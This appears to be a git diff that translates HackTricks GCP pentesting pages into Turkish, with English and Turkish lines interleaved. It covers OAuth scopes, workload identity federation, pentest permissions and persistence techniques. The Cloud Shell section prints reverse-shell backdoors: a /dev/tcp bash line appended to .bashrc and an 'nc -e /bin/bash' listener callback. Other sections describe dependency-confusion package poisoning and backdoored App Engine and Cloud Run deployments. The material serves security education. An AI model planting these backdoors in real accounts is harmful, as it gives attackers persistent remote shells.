"scope": "openid https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/accounts.reauth",
"expires_in": 2253,
"email": "username@testing.com",
"verified_email": true,
"access_type": "offline"
"issued_to": "223044615559.apps.googleusercontent.com",
"audience": "223044615559.apps.googleusercontent.com",
"user_id": "139746512919298469201",
"scope": "openid https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/accounts.reauth",
"expires_in": 2253,
"email": "username@testing.com",
"verified_email": true,
"access_type": "offline"
}
```
Önceki **scopes**, veriye erişmek için **`gcloud`** kullanılarak **default** olarak oluşturulanlardır. Bunun nedeni, **`gcloud`** kullandığınızda önce bir OAuth token oluşturmanız ve ardından bunu uç noktalarla iletişim kurmak için kullanmanızdır.
The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints.
Potansiyel olarak en önemli scope **`cloud-platform`**'dur, bu temelde **GCP'deki herhangi bir hizmete erişmenin mümkün olduğu** anlamına gelir.
The most important scope of those potentially is **`cloud-platform`**, which basically means that it's possible to **access any service in GCP**.
You can **find a list of** [**all the possible scopes in here**](https://developers.google.com/identity/protocols/googlescopes)**.**
If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like:
**[Tüm olası scopes listesini buradan bulabilirsiniz](https://developers.google.com/identity/protocols/googlescopes)**.
Eğer **`gcloud`** tarayıcı kimlik bilgilerine sahipseniz, **diğer scopes ile bir token elde etmek** mümkündür, şöyle bir şey yaparak:
```bash
# Maybe you can get a user token with other scopes changing the scopes array from ~/.config/gcloud/credentials.db
@@ -213,22 +204,17 @@ gcloud auth application-default print-access-token
# To use this token with some API you might need to use curl to indicate the project header with --header "X-Goog-User-Project: <project-name>"
```
## **Terraform IAM Politikaları, Bağlantılar ve Üyelikler**
## **Terraform IAM Policies, Bindings and Memberships**
Terraform tarafından tanımlandığı gibi [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) GCP ile terraform kullanarak bir kaynağa erişim vermenin farklı yolları vardır:
As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
- **Üyelikler**: **Rollerin üyeleri olarak ilkeleri belirlersiniz** **rol veya ilkeler üzerinde kısıtlama olmaksızın**. Bir kullanıcıyı bir rolün üyesi olarak atayabilir ve ardından aynı rolün bir üyesi olarak bir grubu koyabilir ve ayrıca bu ilkeleri (kullanıcı ve grup) diğer rollerin üyesi olarak belirleyebilirsiniz.
- **Bağlantılar**: Birkaç **ilkeler bir role bağlanabilir**. Bu **ilkeler hala diğer rollere bağlanabilir veya o rollerin üyesi olabilir**. Ancak, role bağlı olmayan bir ilke, **bağlı bir rolün üyesi olarak belirlendiğinde**, bir sonraki **bağlantı uygulandığında, üyelik kaybolacaktır**.
- **Politikalar**: Bir politika **otoritativdir**, roller ve ilkeleri belirtir ve ardından, **bu ilkeler daha fazla role sahip olamaz ve bu roller daha fazla ilkeye sahip olamaz**; bu politika değiştirilmedikçe (diğer politikalar, bağlantılar veya üyeliklerde bile). Bu nedenle, bir rol veya ilke politika içinde belirtildiğinde, tüm ayrıcalıkları **o politika ile sınırlıdır**. Açıkça, bu, ilkeye veya ayrıcalık yükseltme izinlerine (yeni bir ilke oluşturmak ve ona yeni bir rol bağlamak gibi) değiştirme seçeneği verildiğinde aşılabilir.
- **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
- **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isnt binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
- **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
## References
## Referanslar
- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
- [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
{{#include ../../../banners/hacktricks-training.md}}

150
src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
View File

@@ -6,10 +6,9 @@
### GCP
In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed:
- **Create the Service Account** to access from github actions with the **desired permissions:**
Github repo'dan GCP **hizmet hesabına** **Github Actions** erişimi vermek için aşağıdaki adımlar gereklidir:
- **İstenilen izinlerle** github actions'dan erişim sağlamak için **Hizmet Hesabı Oluşturun:**
```bash
projectId=FIXME
gcloud config set project $projectId
@@ -24,134 +23,121 @@ gcloud services enable iamcredentials.googleapis.com
# Give permissions to SA
gcloud projects add-iam-policy-binding $projectId \
--member="serviceAccount:$saId" \
--role="roles/iam.securityReviewer"
--member="serviceAccount:$saId" \
--role="roles/iam.securityReviewer"
```
- Generate a **new workload identity pool**:
- Yeni bir **iş yükü kimlik havuzu** oluşturun:
```bash
# Create a Workload Identity Pool
poolName=wi-pool
gcloud iam workload-identity-pools create $poolName \
--location global \
--display-name $poolName
--location global \
--display-name $poolName
poolId=$(gcloud iam workload-identity-pools describe $poolName \
--location global \
--format='get(name)')
--location global \
--format='get(name)')
```
- Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):
- Yeni bir **workload identity pool OIDC sağlayıcısı** oluşturun, bu **güvenilir** github actions (bu senaryoda org/repo adı ile):
```bash
attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization)
gcloud iam workload-identity-pools providers create-oidc $poolName \
--location global \
--workload-identity-pool $poolName \
--display-name $poolName \
--attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \
--issuer-uri "https://token.actions.githubusercontent.com"
--location global \
--workload-identity-pool $poolName \
--display-name $poolName \
--attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \
--issuer-uri "https://token.actions.githubusercontent.com"
providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
--location global \
--workload-identity-pool $poolName \
--format='get(name)')
--location global \
--workload-identity-pool $poolName \
--format='get(name)')
```
- Finally, **allow the principal** from the provider to use a service principal:
- Son olarak, **sağlayıcıdan yetkiliyi** bir hizmet yetkilisi kullanması için izin verin:
```bash
gitHubRepoName="repo-org/repo-name"
gcloud iam service-accounts add-iam-policy-binding $saId \
--role "roles/iam.workloadIdentityUser" \
--member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
--role "roles/iam.workloadIdentityUser" \
--member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
```
> [!WARNING]
> Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).
> Önceki üyede **`org-name/repo-name`** belirterek hizmet hesabına erişim sağlamak için koşullar belirttiğimize dikkat edin (daha **kısıtlayıcı** hale getiren diğer parametreler, örneğin dal da kullanılabilir).
>
> However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:
> Ancak, bir wildcard kullanarak hizmet hesabına **tüm github'ın erişmesine izin vermek** de mümkündür:
<pre class="language-bash"><code class="lang-bash"># Create a Workload Identity Pool
<pre class="language-bash"><code class="lang-bash"># Bir Workload Identity Pool oluştur
poolName=wi-pool2
gcloud iam workload-identity-pools create $poolName \
--location global \
--display-name $poolName
--location global \
--display-name $poolName
poolId=$(gcloud iam workload-identity-pools describe $poolName \
--location global \
--format='get(name)')
--location global \
--format='get(name)')
gcloud iam workload-identity-pools providers create-oidc $poolName \
--project="${projectId}" \
--location="global" \
--workload-identity-pool="$poolName" \
--display-name="Demo provider" \
--attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
--issuer-uri="https://token.actions.githubusercontent.com"
--project="${projectId}" \
--location="global" \
--workload-identity-pool="$poolName" \
--display-name="Demo provider" \
--attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
--issuer-uri="https://token.actions.githubusercontent.com"
providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
--location global \
--workload-identity-pool $poolName \
--format='get(name)')
--location global \
--workload-identity-pool $poolName \
--format='get(name)')
<strong># CHECK THE WILDCARD
<strong># WILDCARD'I KONTROL ET
</strong>gcloud iam service-accounts add-iam-policy-binding "${saId}" \
--project="${projectId}" \
--role="roles/iam.workloadIdentityUser" \
--project="${projectId}" \
--role="roles/iam.workloadIdentityUser" \
<strong> --member="principalSet://iam.googleapis.com/${poolId}/*"
</strong></code></pre>
> [!WARNING]
> In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\
> It should be always something like this:
> Bu durumda, herkes github actions üzerinden hizmet hesabına erişebilir, bu nedenle her zaman **üyenin nasıl tanımlandığını kontrol etmek** önemlidir.\
> Her zaman şöyle bir şey olmalıdır:
>
> `attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
### Github
Remember to change **`${providerId}`** and **`${saId}`** for their respective values:
**`${providerId}`** ve **`${saId}`** değerlerini ilgili değerleriyle değiştirmeyi unutmayın:
```yaml
name: Check GCP action
on:
workflow_dispatch:
pull_request:
branches:
- main
workflow_dispatch:
pull_request:
branches:
- main
permissions:
id-token: write
id-token: write
jobs:
Get_OIDC_ID_token:
runs-on: ubuntu-latest
steps:
- id: "auth"
name: "Authenticate to GCP"
uses: "google-github-actions/auth@v2.1.3"
with:
create_credentials_file: "true"
workload_identity_provider: "${providerId}" # In the providerId, the numerical project ID (12 digit number) should be used
service_account: "${saId}" # instead of the alphanumeric project ID. ex:
activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider'
- id: "gcloud"
name: "gcloud"
run: |-
gcloud config set project <project-id>
gcloud config set account '${saId}'
gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
gcloud auth list
gcloud projects list
gcloud secrets list
Get_OIDC_ID_token:
runs-on: ubuntu-latest
steps:
- id: "auth"
name: "Authenticate to GCP"
uses: "google-github-actions/auth@v2.1.3"
with:
create_credentials_file: "true"
workload_identity_provider: "${providerId}" # In the providerId, the numerical project ID (12 digit number) should be used
service_account: "${saId}" # instead of the alphanumeric project ID. ex:
activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider'
- id: "gcloud"
name: "gcloud"
run: |-
gcloud config set project <project-id>
gcloud config set account '${saId}'
gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
gcloud auth list
gcloud projects list
gcloud secrets list
```
{{#include ../../../banners/hacktricks-training.md}}

170
src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
View File

@@ -1,54 +1,49 @@
# GCP - Permissions for a Pentest
# GCP - Pentest için İzinler
If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
Eğer bir GCP ortamını pentest etmek istiyorsanız, **GCP**'de kullanılan **tüm veya çoğu hizmeti** kontrol etmek için yeterli izin istemeniz gerekir. İdeal olarak, müşteriden şunları oluşturmasını istemelisiniz:
* **Create** a new **project**
* **Create** a **Service Account** inside that project (get **json credentials**) or create a **new user**.
* **Give** the **Service account** or the **user** the **roles** mentioned later over the ORGANIZATION
* **Enable** the **APIs** mentioned later in this post in the created project
**Set of permissions** to use the tools proposed later:
* **Yeni** bir **proje** **oluşturun**
* O projede bir **Hizmet Hesabı** **oluşturun** ( **json kimlik bilgilerini** alın) veya **yeni bir kullanıcı** oluşturun.
* **Hizmet hesabına** veya **kullanıcıya**, ORGANİZASYON üzerindeki daha sonra belirtilen **rolleri** verin
* Oluşturulan projede bu yazıda daha sonra belirtilen **API'leri** **etkinleştirin**
Kullanılacak araçlar için **izin seti**:
```bash
roles/viewer
roles/resourcemanager.folderViewer
roles/resourcemanager.organizationViewer
```
APIs to enable (from starbase):
APIs'yi etkinleştirin (starbase'den):
```
gcloud services enable \
serviceusage.googleapis.com \
cloudfunctions.googleapis.com \
storage.googleapis.com \
iam.googleapis.com \
cloudresourcemanager.googleapis.com \
compute.googleapis.com \
cloudkms.googleapis.com \
sqladmin.googleapis.com \
bigquery.googleapis.com \
container.googleapis.com \
dns.googleapis.com \
logging.googleapis.com \
monitoring.googleapis.com \
binaryauthorization.googleapis.com \
pubsub.googleapis.com \
appengine.googleapis.com \
run.googleapis.com \
redis.googleapis.com \
memcache.googleapis.com \
apigateway.googleapis.com \
spanner.googleapis.com \
privateca.googleapis.com \
cloudasset.googleapis.com \
accesscontextmanager.googleapis.com
serviceusage.googleapis.com \
cloudfunctions.googleapis.com \
storage.googleapis.com \
iam.googleapis.com \
cloudresourcemanager.googleapis.com \
compute.googleapis.com \
cloudkms.googleapis.com \
sqladmin.googleapis.com \
bigquery.googleapis.com \
container.googleapis.com \
dns.googleapis.com \
logging.googleapis.com \
monitoring.googleapis.com \
binaryauthorization.googleapis.com \
pubsub.googleapis.com \
appengine.googleapis.com \
run.googleapis.com \
redis.googleapis.com \
memcache.googleapis.com \
apigateway.googleapis.com \
spanner.googleapis.com \
privateca.googleapis.com \
cloudasset.googleapis.com \
accesscontextmanager.googleapis.com
```
## Individual tools permissions
## Bireysel araç izinleri
### [PurplePanda](https://github.com/carlospolop/PurplePanda/tree/master/intel/google)
```
From https://github.com/carlospolop/PurplePanda/tree/master/intel/google#permissions-configuration
@@ -61,9 +56,7 @@ roles/resourcemanager.folderViewer
roles/resourcemanager.organizationViewer
roles/secretmanager.viewer
```
### [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions)
```
From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions
@@ -71,60 +64,56 @@ roles/Viewer
roles/iam.securityReviewer
roles/stackdriver.accounts.viewer
```
### [CloudSploit](https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration)
```
From https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration
includedPermissions:
- cloudasset.assets.listResource
- cloudkms.cryptoKeys.list
- cloudkms.keyRings.list
- cloudsql.instances.list
- cloudsql.users.list
- compute.autoscalers.list
- compute.backendServices.list
- compute.disks.list
- compute.firewalls.list
- compute.healthChecks.list
- compute.instanceGroups.list
- compute.instances.getIamPolicy
- compute.instances.list
- compute.networks.list
- compute.projects.get
- compute.securityPolicies.list
- compute.subnetworks.list
- compute.targetHttpProxies.list
- container.clusters.list
- dns.managedZones.list
- iam.serviceAccountKeys.list
- iam.serviceAccounts.list
- logging.logMetrics.list
- logging.sinks.list
- monitoring.alertPolicies.list
- resourcemanager.folders.get
- resourcemanager.folders.getIamPolicy
- resourcemanager.folders.list
- resourcemanager.hierarchyNodes.listTagBindings
- resourcemanager.organizations.get
- resourcemanager.organizations.getIamPolicy
- resourcemanager.projects.get
- resourcemanager.projects.getIamPolicy
- resourcemanager.projects.list
- resourcemanager.resourceTagBindings.list
- resourcemanager.tagKeys.get
- resourcemanager.tagKeys.getIamPolicy
- resourcemanager.tagKeys.list
- resourcemanager.tagValues.get
- resourcemanager.tagValues.getIamPolicy
- resourcemanager.tagValues.list
- storage.buckets.getIamPolicy
- storage.buckets.list
- cloudasset.assets.listResource
- cloudkms.cryptoKeys.list
- cloudkms.keyRings.list
- cloudsql.instances.list
- cloudsql.users.list
- compute.autoscalers.list
- compute.backendServices.list
- compute.disks.list
- compute.firewalls.list
- compute.healthChecks.list
- compute.instanceGroups.list
- compute.instances.getIamPolicy
- compute.instances.list
- compute.networks.list
- compute.projects.get
- compute.securityPolicies.list
- compute.subnetworks.list
- compute.targetHttpProxies.list
- container.clusters.list
- dns.managedZones.list
- iam.serviceAccountKeys.list
- iam.serviceAccounts.list
- logging.logMetrics.list
- logging.sinks.list
- monitoring.alertPolicies.list
- resourcemanager.folders.get
- resourcemanager.folders.getIamPolicy
- resourcemanager.folders.list
- resourcemanager.hierarchyNodes.listTagBindings
- resourcemanager.organizations.get
- resourcemanager.organizations.getIamPolicy
- resourcemanager.projects.get
- resourcemanager.projects.getIamPolicy
- resourcemanager.projects.list
- resourcemanager.resourceTagBindings.list
- resourcemanager.tagKeys.get
- resourcemanager.tagKeys.getIamPolicy
- resourcemanager.tagKeys.list
- resourcemanager.tagValues.get
- resourcemanager.tagValues.getIamPolicy
- resourcemanager.tagValues.list
- storage.buckets.getIamPolicy
- storage.buckets.list
```
### [Cartography](https://lyft.github.io/cartography/modules/gcp/config.html)
### [Haritalama](https://lyft.github.io/cartography/modules/gcp/config.html)
```
From https://lyft.github.io/cartography/modules/gcp/config.html
@@ -132,9 +121,7 @@ roles/iam.securityReviewer
roles/resourcemanager.organizationViewer
roles/resourcemanager.folderViewer
```
### [Starbase](https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md)
```
From https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
@@ -143,6 +130,3 @@ roles/iam.organizationRoleViewer
roles/bigquery.metadataViewer
```

7
src/pentesting-cloud/gcp-security/gcp-persistence/README.md
View File

@@ -1,6 +1 @@
# GCP - Persistence
# GCP - Süreklilik

14
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
View File

@@ -1,25 +1,21 @@
# GCP - API Keys Persistence
# GCP - API Anahtarları Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## API Keys
## API Anahtarları
For more information about API Keys check:
API Anahtarları hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-api-keys-enum.md
{{#endref}}
### Create new / Access existing ones
### Yeni oluştur / Mevcut olanlara eriş
Check how to do this in:
Bunu nasıl yapacağınızı kontrol edin:
{{#ref}}
../gcp-privilege-escalation/gcp-apikeys-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
View File

@@ -1,25 +1,21 @@
# GCP - App Engine Persistence
# GCP - App Engine Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## App Engine
For more information about App Engine check:
App Engine hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-app-engine-enum.md
{{#endref}}
### Modify code
### Kodu Değiştir
If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
Eğer çalışan bir versiyonun kodunu değiştirebilir veya yeni bir tane oluşturabilirseniz, arka kapınızı çalıştırabilir ve sürekliliği sürdürebilirsiniz.
### Old version persistence
### Eski versiyon sürekliliği
**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
**Web uygulamasının her versiyonu çalıştırılacak**, eğer bir App Engine projesinin birden fazla versiyonu çalışıyorsa, **arka kapı** kodunuzla **yeni bir tane** oluşturabilir ve ardından **yeni bir meşru** tane oluşturabilirsiniz, böylece sonuncusu meşru olur ama **arka kapılı olan da çalışmaya devam eder**.
{{#include ../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
View File

@@ -4,43 +4,39 @@
## Artifact Registry
For more information about Artifact Registry check:
Artifact Registry hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-artifact-registry-enum.md
{{#endref}}
### Dependency Confusion
### Bağımlılık Karışıklığı
- What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
- The one with the **highest priority set in the virtual repository** is used
- If the **priority is the same**:
- If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
- If not, the **highest version** is used
- **Uzak ve standart** depolar **sanaldaki** bir depoda **karıştırılırsa** ve her ikisinde de bir paket varsa ne olur?
- **Sanal depoda en yüksek önceliğe sahip olan** kullanılır
- Eğer **öncelik aynıysa**:
- Eğer **sürüm** **aynıysa**, sanal depodaki **politika adı alfabetik olarak** ilk olan kullanılır
- Aksi takdirde, **en yüksek sürüm** kullanılır
> [!CAUTION]
> Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
> Bu nedenle, eğer uzak depo daha yüksek veya aynı önceliğe sahipse, bir kamu paket kayıt defterinde **en yüksek sürümün (bağımlılık karışıklığı)** **istismar edilmesi** mümkündür.
This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
Bu teknik, **kalıcılık** ve **kimlik doğrulaması yapılmamış erişim** için faydalı olabilir; bunu istismar etmek için sadece Artifact Registry'de saklanan bir **kütüphane adını bilmek** ve **kamu deposunda (örneğin Python için PyPi) aynı kütüphaneyi daha yüksek bir sürümle oluşturmak** gerekir.
For persistence these are the steps you need to follow:
Kalıcılık için takip etmeniz gereken adımlar şunlardır:
- **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
- Create a remote repository if it doesn't exist
- Add the remote repository to the virtual repository
- Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
Run something like:
- [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
- Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
- **Gereksinimler**: Bir **sanal depo** **var olmalı** ve kullanılmalı, **kamu deposunda** bulunmayan bir **isim** ile bir **iç paket** kullanılmalıdır.
- Eğer yoksa bir uzak depo oluşturun
- Uzak depoyu sanal depoya ekleyin
- Uzak depoya daha yüksek (veya aynı) öncelik vermek için sanal kayıt defterinin politikalarını düzenleyin.\
Şunu çalıştırın:
- [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
- Geçerli paketi indirin, kötü niyetli kodunuzu ekleyin ve aynı sürümle kamu deposuna kaydedin. Her seferinde bir geliştirici bunu yüklediğinde, sizinkini yükleyecek!
For more information about dependency confusion check:
Bağımlılık karışıklığı hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/dependency-confusion
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
View File

@@ -1,25 +1,21 @@
# GCP - BigQuery Persistence
# GCP - BigQuery Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## BigQuery
For more information about BigQuery check:
BigQuery hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-bigquery-enum.md
{{#endref}}
### Grant further access
### Ek erişim ver
Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
Kompromize olmuş kullanıcılar veya dış kullanıcılar için veri kümeleri, tablolar, satırlar ve sütunlar üzerinde ek erişim verin. Gerekli ayrıcalıkları ve bunu nasıl yapacağınızı sayfada kontrol edin:
{{#ref}}
../gcp-privilege-escalation/gcp-bigquery-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
View File

@@ -4,20 +4,16 @@
## Cloud Functions
For more info about Cloud Functions check:
Cloud Functions hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-cloud-functions-enum.md
{{#endref}}
### Persistence Techniques
### Süreklilik Teknikleri
- **Modify the code** of the Cloud Function, even just the `requirements.txt`
- **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
- **Trigger** a Cloud Function when something happens to infect something
- **Cloud Function'ın kodunu değiştirin**, sadece `requirements.txt` bile olsa
- **Herkesin** savunmasız bir Cloud Function'ı veya bir arka kapıyı çağırmasına izin verin
- **Bir şey olduğunda** bir Cloud Function'ı tetikleyin, bir şeyi enfekte etmek için
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
View File

@@ -1,29 +1,25 @@
# GCP - Cloud Run Persistence
# GCP - Cloud Run Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Run
For more information about Cloud Run check:
Cloud Run hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-cloud-run-enum.md
{{#endref}}
### Backdoored Revision
### Arka Kapı İçeren Revizyon
Create a new backdoored revision of a Run Service and split some traffic to it.
Bir Run Servisinin yeni bir arka kapı içeren revizyonunu oluşturun ve bazı trafiği ona yönlendirin.
### Publicly Accessible Service
### Kamuya Açık Servis
Make a Service publicly accessible
Bir Servisi kamuya açık hale getirin.
### Backdoored Service or Job
### Arka Kapı İçeren Servis veya İş
Create a backdoored Service or Job
Bir arka kapı içeren Servis veya İş oluşturun.
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
View File

@@ -1,73 +1,63 @@
# GCP - Cloud Shell Persistence
# GCP - Cloud Shell Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Shell
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}
### Persistent Backdoor
### Sürekli Arka Kapı
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
[**Google Cloud Shell**](https://cloud.google.com/shell/) size tarayıcınızdan doğrudan bulut kaynaklarınıza komut satırı erişimi sağlar ve bununla ilgili herhangi bir maliyet yoktur.
You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
Google'ın Cloud Shell'ine **web konsolu** üzerinden veya **`gcloud cloud-shell ssh`** komutunu çalıştırarak erişebilirsiniz.
This console has some interesting capabilities for attackers:
Bu konsolun saldırganlar için bazı ilginç yetenekleri vardır:
1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
3. There is **no capabilities for an organisation to monitor** the activity of that instance.
This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
1. **Google Cloud'a erişimi olan herhangi bir Google kullanıcısı**, tamamen kimlik doğrulamalı bir Cloud Shell örneğine erişim sağlar (Hizmet Hesapları, organizasyonun Sahipleri bile olsa erişebilir).
2. Bahsedilen örnek, **hiçbir etkinlik gerçekleşmezse en az 120 gün boyunca** ana dizinini koruyacaktır.
3. Bu örneğin etkinliğini **izleme yeteneği yoktur**.
Bu, temelde bir saldırganın kullanıcının ana dizinine bir arka kapı koyabileceği ve kullanıcı her 120 günde en az bir kez GC Shell'e bağlandığı sürece, arka kapının hayatta kalacağı ve saldırganın her çalıştırıldığında bir shell alacağı anlamına gelir.
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
Ev dizininde, kullanıcı **cloud shell**'e eriştiğinde **her seferinde** **çalıştırılacak** olan başka bir dosya olan **`.customize_environment`** bulunmaktadır (önceki teknikte olduğu gibi). Kullanıcı "sık sık" cloud shell'i kullandığı sürece kalıcılığı sağlamak için önceki arka kapıyı veya aşağıdakine benzer bir arka kapıyı ekleyin:
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
> [!WARNING]
> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
> **Kimlik doğrulama gerektiren bir eylem gerçekleştirildiğinde**, kullanıcının tarayıcısında bir onay penceresi açılır. Bu pencerenin kabul edilmesi, komutun çalışabilmesi için gereklidir. Beklenmedik bir pop-up görünürse, bu şüphe uyandırabilir ve kullanılan kalıcılık yöntemini tehlikeye atabilir.
This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
Bu, bulut shell'den (saldırgan olarak) `gcloud projects list` komutunu çalıştırdığınızda tarayıcıda görülen pop-up'tır:
